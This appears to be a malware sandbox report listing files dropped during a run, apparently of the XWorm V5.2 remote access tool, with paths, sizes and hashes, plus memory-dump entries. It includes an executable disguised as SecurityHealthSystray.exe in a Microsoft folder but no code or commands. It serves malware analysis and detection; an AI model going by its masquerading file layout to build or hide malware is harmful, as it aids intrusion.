SHA512
e4f0dc09e6e6aef958c33c2784419036cab315acbccd9f949836f0c253ce8516804378add076eb0fed5018c0ccfda4b141307dc9fe470dc7ee658ece4cc44639

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
832B

MD5
dd683773e834c6ecc6d3b17a41fb899a

SHA1
2407255c9832920df09576de295fa84141e85fb2

SHA256
8deb620b5d6436f1b65d7d51d78e126a1b85f10f84e70cf61a08ce3d30de5e0a

SHA512
7020be242c1d328707250fcdc5dbaad51a632f2370efb7062a209da0729d87b974462b0af03e10adba56d78234cf06c8a884377d911dfa4ae267dc2f7a8089c5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
312B

MD5
0c04ad1083dc5c7c45e3ee2cd344ae38

SHA1
f1cf190f8ca93000e56d49732e9e827e2554c46f

SHA256
6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0

SHA512
6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
468B

MD5
8136fb82cce0429b6234cfa3429c714b

SHA1
13bbb25096e263d80dc64dc59724f94e701b1ecc

SHA256
1f6493e19e33f13d795981317c942030af6e3e997023bcd8882d085f4746ca0b

SHA512
6a55a647e3ce18e5fc22107cf59b4c7749a5296337369e9f88b6ab8064c363a40555a1727caf932f26b8d97819a89ded257fd384773a6e9bfd0be3904179bc87

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
468B

MD5
aeb2f0cd951bbc969f34b5fb36db5b7c

SHA1
e37556e8ac9960d9ae065862b38e6e63bd23f1f0

SHA256
1d592f3e6c50f4bf1c9a6a4fd782bb3973e320da1b9efc0b1782100314064b85

SHA512
878719e1e409484efab4272500bdc9b6e015ba57e7f46a3483c0c7fcfbde7f71d33bafecedef6d1c0ec6793d65a9a8e73fa306b8d6405e6f7af19dcfade42a5e

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
2KB

MD5
d99f2dbd7e29c4544ca72e901d97b945

SHA1
dd0f4b928ac01ed014762653f872172526f6ca55

SHA256
4f3c016c9218641cc9cd946c73e1f277a5bd4f2add2d4938d9ac8808e783184d

SHA512
ff6e3fa88648da6dba36f6861aa6766328e86d649738c9137fe8aa19c8c50588665090af17dc4a337b39f8d3420d5eb671186b9ff99832540f3809a84dea0cdc

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
2KB

MD5
c85f2657e29da27754e101b22dd265a6

SHA1
bbce44e29b0ed59c794388d16ec51e60209a317e

SHA256
3a4a88ce93416c5744243e4d3ec1aea4e3fbe6e86c24b919ba4cc6574c88bcfc

SHA512
6230d40251f8adf861cc7db8a4d1dacd74b88b25e46e106908bd99ce416c7094f45e9c2b1b812d0b8814b7812fce553f225a5c219214506629e203554d5fd10f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
2KB

MD5
3228c3cd0cf59b7493e260ca64df2f72

SHA1
9d6caf12064028e7d87b7ae52fa9c526810eafb3

SHA256
f8babd4ccc45a367885fd81ff420329bd64ed4636e13ecfad133cd7b29f1bccc

SHA512
e976f6f7cfddfdc1108be8274970b6184dd613734a33cd8c57bd94d3384047fca80db247fd75dd59ef308e14c42bde8ad8f2cb328a930aed8d1ce05587c9eeb8

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
b243dbd6a48e68bb8f910e1ef5332314

SHA1
7b56250b71a87864ad2c81eab76f13095f0eef81

SHA256
ef9f88097e5ad096cb80c27cd6440037dc267a4a06a2d960a1faf6efa6937d7a

SHA512
df349aa3646622a5909b667d4774ac41eacfa13d620fe738c842cb1ef51e7d7954cd0abdb17022d7409225eca83d9e871beea9557c0071b2faf71f940c1f55f7

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
5KB

MD5
0916bd05b5ad5172f6ff074ff7a9d10a

SHA1
50f55e6b27ba95ab9127e2901e7bc221a9c3f07e

SHA256
17490e3058a96db7969de1141cd0a9a1bd764e044e14a92ad1b8a112705d3a8e

SHA512
70bbed671bc72898d78fecaf61b16931986d75ac14522d7408a8d698194068d4e8e8079eac81463deee0500fa1144405f591998d974440bfac623af60f21af8b

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
5KB

MD5
816d64f3465cdf3b1e09f399d490e76d

SHA1
0b750396f79afd59879c3616b261654bfbd3a08f

SHA256
07701035ef337e00cc7535b211d7bc71db934181090a1744f8d0703b8547bd5e

SHA512
f1e3a92b99c45b570d8aa1b014bcc5d4df94859c6f06100d0cb42c69fba707fea46418e2ce7e79850b12a391fce2d065c43c0ec18606724f3565b8af93df9e02

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
8e34d578eb2bf6d65e4263c153be5af7

SHA1
3c42b232cc01abd5130f3af226f83b8289b9e96d

SHA256
b468656ab8875c4070389d0c0a8d5c5c16ae24fd7d7aa8a35e29de407db1d3e1

SHA512
4a94f393db6f2647befff1aa4b7323158eff87f73104b383e5d5ec7f53ec28d10c79723a909451805eef3a6811fe444fbc6bbfadd3bece5ff2c7a507448fa94b

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
b903f809e1b160b6dc4b2d18ddd3686e

SHA1
3e765aa18b2d5f28ae7ff2f63cd1e9a526611af5

SHA256
bbc4a8daefb7ea06a4cc91f99f245c19afa83c1c304c4372fadf8d3fc599e313

SHA512
c9c5296199aa67498c2d85386300a6ba81be72b15314079faaf37a1a80574a0ffa58bc10da1cecff2c3277fd9c30293db4d1426def8c6e1a0390c42b62f81478

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
0ba76ca93f0e1326477054a2431ff014

SHA1
f8738df062f2c15a7fd12ce856d6749b05209a9b

SHA256
cd36b693927a091bd498dca381c3eb896528b688e2ee7c24e9945072ce5a0971

SHA512
167deefba0f40cfda83f943fcab093bb09bb1bbf29679711c2c97df6bd5bac0526ff2aef9c93d8964dd4b90778077345285546b192ae17dea731670901a7c4cc

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
5KB

MD5
a055d658a237dcc8339460fe08cda900

SHA1
b82c6ed36ac68f6bbbfc567e58d1a5cde00c0a00

SHA256
004ba2ee517d21ffc9c527262dd09559641f0ba0a52971be3928ed0169276766

SHA512
bb98c012e5025e1ba1a0d9a6d9bd68e52352be49440b0497e9b0f27306c7878ea1475b4880d1f23721692ba6c3b044f5ca9e22173006e6173b105e85c481659f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
f7ae044f2d9466926a585b875e2de97d

SHA1
88b124c424add94b756bd37c027daed6c352ece8

SHA256
31e940df3aee18913296603841ff00a6efdf7d4f144afacb899f032b0e4c10b3

SHA512
9e787325602879d217162c0b09ef5fb43a9f614a44188457433ad34b08e4c3ce88db85ddcc7e8e48bf0cbed00c0da3955cdb70fe02d8735e91e84b720de7f7a6

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
fbe635e1e4cf5dd968eb1eea692684f4

SHA1
4bc742ccc68053da060c152b173d861b00409b30

SHA256
c5c751b6df9da86848bf70c9123ff9258b83e0884ef8583943e18319aad1746b

SHA512
94de9ed96c1b8370328f2b1c798f0fc471fe30a1c54d397de7254e4a92333b19cabee35dd03c2ae0a2d64bd95ec283fcb269ba54147fb6a6c2b6fc60e40838c6

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
4a190ca6af7f6da45816304f1c866ed0

SHA1
6d97c581e16a865a1dd549615c00ee88a6a2b7e2

SHA256
ef310c33e15f10e65015a267720b664261c90af69570d76368747e60207e0988

SHA512
96ed959281b1b1a7429c068436913f0279564c40f2472106faa38d76f1e746ca42f87ca4eb77c03fbe78b0a31bae6ef53c6a58e5592779269a16b19865cf5e66

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
c1a4f07bb52f621f3e5a70b74a25e52c

SHA1
cd9cbbd2586eedf63b272087d6a554275147952d

SHA256
d3103683dda39bec0d53f2c58bd1e499578d50cd6cefea790c23d817f59ff933

SHA512
9fc1887b01975ff8504253a64f6664869379aa851287155a100250da84069884a11451ecfd4bd18898981e9cf34c11233e93b9bc492af07421cdb78a6899bddc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
3.3MB

MD5
518ae13f9974ef3c548e25655705f193

SHA1
4e6c5942604cd01917f2ad9ded6c6b5f04f63699

SHA256
5f14b9fd993b88bee0fd7c494a520123ef67e358579e16202a4590afde00a1e3

SHA512
43d576bbb552314f59e19c780ddeccfd466ce9215d4e59ded72574c193e2bc2250d29c6bf982db3b1b461a131e95681485107fa41954855e855b365a2538c447

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
6.3MB

MD5
ee4e8cc22fb18868cc6561b8f4e8d29a

SHA1
f290379ab888bee8e2edf509d88aa0ba7e3cd045

SHA256
e67a6d6572dc1881c72f52c1b659e6d423795754f0cc51d8e42209ea72aee2a8

SHA512
1b7a16b8e7fccc3d241d611b7ce606a9994bae7127f2d1efa2eac9410ed4c466408faff6089fb588c6df65d71f3f1afce707b19d5ee330afc4fedd7eeef8ebf9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin

Filesize
11KB

MD5
0c478c563f615977259c5eba04657917

SHA1
dfe75d79a56d9ef981d33569415ff90c731a22e2

SHA256
1a835b2d1faf49857c47d88189fcef90c8df3f653aa75dd03eccd17379b8d798

SHA512
959a82c7ad22caf4a4336fa5215ea4655d1396d61a2020a0140644650aa21e7220aaab617905fa4ac159a92f1cdae15d905a5361cc72dfcfc24e01fb39ce0a22

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin

Filesize
6KB

MD5
9222f6f2aab85a85122799d25c15c771

SHA1
52bcf2d8b3fd3ee29fd9fb1f322f0908c1210904

SHA256
f59b1a09d04f122a6292cb43db15f7ebcf75a28c31ff68a1750d889f296b7091

SHA512
efb13a939847ab9c6361eacf3e2e830fc58054ff0343e811bd1e85dd8d85ee2fe8835fc1fb3b2b8864a6d0eabdf4049778ff98f81d3d9d901722f8deb81b3dd3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin

Filesize
6KB

MD5
d0a8cb6df668068946b48e3d097813f8

SHA1
149131d24c93fae10ac1e6c6e7751145046e883a

SHA256
e59577dc181a3a1da98681a7636063f1de7905e20d4554e88fa09a3476814adb

SHA512
b326d8b5a3f72d221b4dc0cf1771ad85e2db1fdb7564b3e4e9ec797ad10344bb109c62fa4684863379a5bcd46ff1deda90fa4dee3c3f70e31d52cf143c8da847

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
4992d41baef3c0bbced7cd87c7b07b1f

SHA1
bb521eabbdc34072fb610ce174ca58783834ecf9

SHA256
b39afd9df29cca02f0ac9501a7a2c1fecbe8895c5b9ce1dc4ca522666cfd7d01

SHA512
9f87c96a0eb1a0344e3b0d56cb5d213c1e149d3b6f029caa55a17a3d184f201f4850726e4e9f79e6c8eaee736de516694a9bc692151fa18ca9174a95fc57511b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
b27454902070c984fc7f5acc88328ea4

SHA1
4583c28dd778245cc48f1413c0bd44a427619d41

SHA256
bd4ec988b539cf4882a9649ddc9ea2839e0845c6ae33a23c2d3f7e02ec597938

SHA512
77b770d2bbc3e1a85c04780de53f3b997067e976692bb7df53ff597b96240fedf8d6b83df07eaa4e8d4022cf1aa89843bfff5a52a78528129567d4f1ad1bc45e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

Filesize
25KB

MD5
435f96fbda8822e03b3af599443099c2

SHA1
2e1cbd852d3d8e2b7bb8ac710c473bf41d3fed9e

SHA256
0d9a0fbefe9913411560cccab950cfa05fe2e0a2b6b69f0861736d50c6a55559

SHA512
af95dff803123ec8198f0ec7ab28bf2b87eb846c9d5b64736e43183b5ef0630d29a0062b95507cca68ac1542b142c3bbd9f7f9280c5957b3650292b163b60d94

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
e6ee5e4eb4c026c8e36098087e9ffcfe

SHA1
9de882196126cf07cbceb84e83ab2163d150196e

SHA256
3d77d02ddaff0f02d05b2fb00f637bb71448f8abbd82822ff6025ab139463033

SHA512
bc48a3888c4e88c95c8c87c43c3196a599621dac85f7f0360878df1ed98eced53014d2a2eb0eaba8be70f388e1bd7b6eed3921967621d08458161af07f9ae0a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\1c77a58a-7bb8-4075-b50d-7a5cc65744c2

Filesize
671B

MD5
185e6decc852b7af75c7f3b2cacf0387

SHA1
cea2f9e10df20d8cd5a9ae1700dd1004343bcf06

SHA256
c1cd359e322af2c409c05006a4ee2ffdd22729b5cc3023c805352d0554cd2863

SHA512
85f5146758a09af87b2c55b015deed387db44e98e4d891b59eac608db1ea3f7d9524fb04502c27b7900a69f1b848d38de72e53547c53d6edf693b7e83558ba49

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\8db044d4-8bec-4821-9a5d-59284e06637a

Filesize
24KB

MD5
b6f381ee930133b46411e11240fbb709

SHA1
8260cc4a98864dac15c91d73de7e9b4a152669f1

SHA256
c41e0f019bbe7866c1e1185852081493d6a94fc95ea5c841a11d1f7f88fd3a8b

SHA512
7c3c8d748ebee825371f0bbec990cbf81bd968790a56367b02e6138ad873cf74bd53298d0543c82e206197ea1c21be68abf5e855bd1234dc459507d6a523b7cb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\cf4a708b-e4de-4834-8519-24a9833ce274

Filesize
982B

MD5
e45f80bf3d578753917ab4bbb4623291

SHA1
7f1ea5277bca52073db4ae266a4af27f96511bda

SHA256
2022d3966ca9c2fbfb7971942008cc3d172848a6301242f59c237bec5d7b19d0

SHA512
7dd3033a83d5f40b89da9116aa9e4df77a98232e5e4977a5ef28282debe8b7a6e25b55b06f8dff81164f7b5f1b9b53b4ed98799ff6748368b4ee0723e001fd16

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\ff02ef31-7ade-48e4-bd3d-70edf56d19f3

Filesize
911B

MD5
bbfe1715c8265e72373b9943b0b7fcfc

SHA1
cde0ec2e3510485ce9d718b768baebcfe6f78a74

SHA256
1363c8219748420c8a68777554062dad451b864d7cc8415b6c261f2ca13f22e0

SHA512
1e1828a14d32773a2e91f11fd8b363e4347684b6ce457ae44deecc1c3aaaceca9445ec620e33df796d633e03d616402034955a83e6b3f13a858f7a61d99dcc6b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs-1.js

Filesize
15KB

MD5
1cba422f0b6f84d9718e1a256ea95442

SHA1
b66c56a87f62cadb9730540e7077db6aa46cd5eb

SHA256
ceb14573db7878e9d33cdfb8425bc41f380de5d2e1f02cb1451c1b11a8331fff

SHA512
d63b1806dfc600d3f7a7dfe4831ba8e141aea5ed0a5f04911609ce8229a98c5e9a5b00cd66597676047486669401a77690616fbc4cb9359260886c66a0f55cb0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs-1.js

Filesize
12KB

MD5
5378eeb2b72d00fb37a696ad7c4e75ab

SHA1
8749443411e788d0238e33e1987381a799fb9f96

SHA256
ae5dcc2d5ddad8951fafb934f1c615569173f8f8f97229fea0ed7400c765852c

SHA512
77ea036fdb630be0eec2bfab546973b199cb8a4e21caa1931e8ec71ae1ba795bbbcbb72b10e5614804f65c75ec0dcf4abb10baf2e4d50f3ef70fc47c8056e232

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs-1.js

Filesize
15KB

MD5
043c275068d22145bab4cb5e5b0bb7da

SHA1
af0bc4560116d83a96fb85c039e128c5d0412dfe

SHA256
396da1ad679ea438d082cf66bc112de6f654ab219cf018c81a157e988e576bb5

SHA512
244dbc8679e8bd638bafd13c55de1f3a5cfbd57490e800690d2819b1c12d6efc626f4fd3d493c6bdc7811645cc2049edd87c16be14fc16d973cc9d6ae096b818

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs.js

Filesize
10KB

MD5
8989bf24483440d5c7a3a0147bb0be49

SHA1
f9420b01470f130226b036889135c927c85f54d7

SHA256
84af7fdfa9e2358bd08b13468f8b4300501a9c108379bef73107d2d1602d93b2

SHA512
e68eca92b29504e05bc5d00833f434d8bcf282419af732db660aab3add933ab5a9ca66ff5f57e4eac23fa3c7a9c302c19290148695be34f42d32437a6f749656

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
602f68d1968a79f9aff5cfb09d09944f

SHA1
7203d78c7ab70072409ac5be57917685075bb9bd

SHA256
4b72f1f6754e27aa91df27ca995b6af6560763da22e0e732f7ab9759b8bbf404

SHA512
585795add888a719fbe1b0127dd8cea8ee9f32a3bed1f400a692240a4bf64a5d6f79b83dd068492c91c2b180e9e2856eaf5a028c3a3925a44f55be206ad52189

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
529a022901b423d4fc4826f26091fafd

SHA1
3683293bc978285da74156a1ec1077186a766c40

SHA256
b4665e88443ead1b0c5c8d8c72e4d89b134857139d161e53d7db13d4797ec975

SHA512
8c90327c8b0560be24ff8ce135e4f3461ff81a3dd530439e473adc7462ae3e09e68478234b58377d2c8b7e59b5ec84b761c4a64c23f41a262948a34b684cc43c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
88a41d34c3e651688bc01c0180fbd807

SHA1
c5dbdd04fcbbeb874327e42eec31c04c2e66716c

SHA256
32671a2f178b7eb037f79e23123cd3ca70d9c005efaeb868678bee3115b322e3

SHA512
70cea68f4612f3ee110b2ae1a270861f4ddf4fcbbc39eb3f601c4b50d96dfefca68d9a7e7d3c546d296ab805563c121996ba578046c5335828672476795c39bc

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\Guna.UI2.dll

Filesize
1.9MB

MD5
bcc0fe2b28edd2da651388f84599059b

SHA1
44d7756708aafa08730ca9dbdc01091790940a4f

SHA256
c6264665a882e73eb2262a74fea2c29b1921a9af33180126325fb67a851310ef

SHA512
3bfc3d27c095dde988f779021d0479c8c1de80a404454813c6cae663e3fe63dc636bffa7de1094e18594c9d608fa7420a0651509544722f2a00288f0b7719cc8

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\Icons\icon (15).ico

Filesize
361KB

MD5
e3143e8c70427a56dac73a808cba0c79

SHA1
63556c7ad9e778d5bd9092f834b5cc751e419d16

SHA256
b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188

SHA512
74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\MonoMod.Backports.dll

Filesize
138KB

MD5
dd43356f07fc0ce082db4e2f102747a2

SHA1
aa0782732e2d60fa668b0aadbf3447ef70b6a619

SHA256
e375b83a3e242212a2ed9478e1f0b8383c1bf1fdfab5a1cf766df740b631afd6

SHA512
284d64b99931ed1f2e839a7b19ee8389eefaf6c72bac556468a01f3eb17000252613c01dbae88923e9a02f3c84bcab02296659648fad727123f63d0ac38d258e

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\RVGLib.dll

Filesize
241KB

MD5
d34c13128c6c7c93af2000a45196df81

SHA1
664c821c9d2ed234aea31d8b4f17d987e4b386f1

SHA256
aaf9fb0158bd40ab562a4212c2a795cb40ef6864042dc12f3a2415f2446ba1c7

SHA512
91f4e0e795f359b03595b01cbf29188a2a0b52ab9d64eadd8fb8b3508e417b8c7a70be439940975bf5bdf26493ea161aa45025beb83bc95076ed269e82d39689

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe

Filesize
12.2MB

MD5
8b7b015c1ea809f5c6ade7269bdc5610

SHA1
c67d5d83ca18731d17f79529cfdb3d3dcad36b96

SHA256
7fc9c7002b65bc1b33f72e019ed1e82008cc7b8e5b8eaf73fc41a3e6a246980e

SHA512
e652913f73326f9d8461ac2a631e1e413719df28c7938b38949c005fda501d9e159554c3e17a0d5826d279bb81efdef394f7fb6ff7289cf296c19e92fd924180

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe.config

Filesize
183B

MD5
66f09a3993dcae94acfe39d45b553f58

SHA1
9d09f8e22d464f7021d7f713269b8169aed98682

SHA256
7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7

SHA512
c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe

Filesize
109KB

MD5
f3b2ec58b71ba6793adcc2729e2140b1

SHA1
d9e93a33ac617afe326421df4f05882a61e0a4f2

SHA256
2d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae

SHA512
473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe.config

Filesize
187B

MD5
15c8c4ba1aa574c0c00fd45bb9cce1ab

SHA1
0dad65a3d4e9080fa29c42aa485c6102d2fa8bc8

SHA256
f82338e8e9c746b5d95cd2ccc7bf94dd5de2b9b8982fffddf2118e475de50e15

SHA512
52baac63399340427b94bfdeb7a42186d5359ce439c3d775497f347089edfbf72a6637b23bb008ab55b8d4dd3b79a7b2eb7c7ef922ea23d0716d5c3536b359d4

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\start.bat

Filesize
59B

MD5
81a88df17e5b73e1836599034aa6cbe4

SHA1
ab48c97c37ed395bfa507ec1c14176e67ecab398

SHA256
f11af0fc77260978bd5c542172fd3f21a9ebd7bc8d5cab766cba4a480fa2c307

SHA512
c8fa430bf7c0036ea7230d49b525ee87b8d15e4e73b3417efe8816b82161df0a18214dca21777efd4fe25fae012ce4819521c5763a021b8099ed0bc703fb64ec

Download Submit
C:\Users\Admin\Downloads\XWorm V5.2\start.exe

Filesize
7.5MB

MD5
2e62e776b7eeac3dd713f1a6da5f942d

SHA1
6516d9ef1212939a12a84a396b3c64ecea878c11

SHA256
68b1696d3c76eedc131349ecd65a23372082feb83bb66d9d9be296916910e7ea

SHA512
04c73c5505e56fd21f1a25c085c99a1c1cc19cbac8004ce3e974e05f9754c5d07051fdfa53f5a0f0b8a89c16412757b1a29cf487c552212531bcac42ead849bb

Download Submit
C:\Users\Admin\Downloads\XWorm V5.TaUPfaUK.2.7z.part

Filesize
36.3MB

MD5
8e391f6618b90ddcefb8048b768c20c8

SHA1
5ba1ee1aad993c5b76ba722706c146e3456e16d6

SHA256
5730c3bf3e6bc163dee6bab4660722c55eb1a4d878faa1f5b2a1c3e5929a0528

SHA512
b1358fc3f0694b84a12b1e50e049777ea2b89dc5ac3b12ac852b0e5929d8a51ed53479c2ea0e2e194faa570c370ed61bbc654cc4625d0aeb8514b44bbef08df9

Download Submit
memory/532-4028-0x00000000051D0000-0x00000000051D6000-memory.dmp

Filesize
24KB

Download
memory/532-4029-0x0000000005200000-0x0000000005206000-memory.dmp

Filesize
24KB

Download
memory/548-3725-0x0000000000310000-0x000000000124C000-memory.dmp

Filesize
15.2MB

Download
memory/548-3722-0x0000000000310000-0x000000000124C000-memory.dmp

Filesize
15.2MB

Download
memory/1084-4493-0x0000000004EE0000-0x0000000004EE6000-memory.dmp

Filesize
24KB

Download
memory/1084-4494-0x0000000004F10000-0x0000000004F16000-memory.dmp

Filesize
24KB

Download
memory/1140-5012-0x00000000003F0000-0x0000000000410000-memory.dmp

Filesize
128KB

Download
memory/1140-5013-0x000001F64CD10000-0x000001F64CD16000-memory.dmp

Filesize
24KB

Download
memory/1140-5014-0x000001F64CD20000-0x000001F64CD26000-memory.dmp

Filesize
24KB

Download
memory/1576-299-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/1576-323-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/1576-13-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/1576-332-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/1576-233-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/2320-241-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/2320-302-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/2320-297-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/2320-324-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/3228-230-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/3228-231-0x0000000000344000-0x0000000001446000-memory.dmp

Filesize
17.0MB

Download
memory/3228-7-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/3228-296-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/3228-0-0x0000000000344000-0x0000000001446000-memory.dmp

Filesize
17.0MB

Download
memory/3228-1-0x0000000000340000-0x0000000001982000-memory.dmp

Filesize
22.3MB

Download
memory/3856-38-0x0000000005500000-0x000000000551B000-memory.dmp

Filesize
108KB

Download
